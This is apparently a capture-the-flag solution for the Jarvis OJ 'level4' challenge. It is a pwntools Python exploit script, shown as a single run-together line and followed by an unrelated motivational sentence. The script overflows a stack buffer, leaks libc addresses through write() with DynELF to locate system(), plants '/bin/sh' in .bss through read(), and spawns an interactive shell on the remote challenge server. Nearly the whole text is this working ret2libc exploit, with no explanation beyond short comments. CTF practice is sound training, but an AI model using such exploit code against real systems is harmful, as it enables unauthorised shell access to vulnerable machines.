Jarvis OJ-Level4
#!/usr/bin/env python # coding:utf-8 from pwn import * elf = ELF('level4') write_plt = p32(elf.symbols['write']) start_addr = p32(elf.symbols['_start']) read_plt = p32(elf.symbols['read']) data_addr = p32(elf.symbols['__bss_start']) junk = "A" * (0x88 + 4) Io = remote("pwn2.jarvisoj.com", 9880) def leak(addr): payload = junk + write_plt + start_addr + p32(1) + p32(addr) + p32(4) Io.send(payload) leaked = Io.recv(4) print "[%s] -> [%s] = [%s]" % (hex(addr), hex(u32(leaked)), repr(leaked)) return leaked # leak the address of system() d = DynELF(leak, elf=ELF("./level4")) system_addr = d.lookup('system', 'libc') print "[system()] -> [%s]" % (hex(system_addr)) # write /bin/sh payload = junk + read_plt + start_addr + p32(0) + data_addr + p32(8) Io.send(payload) # send /bin/sh Io.send("/bin/sh\x00") # call system #read_output() payload = junk + p32(system_addr) + p32(0xFFFFFFFF) + data_addr Io.send(payload) # interactive() Io.interactive()
Always believe that good things will come.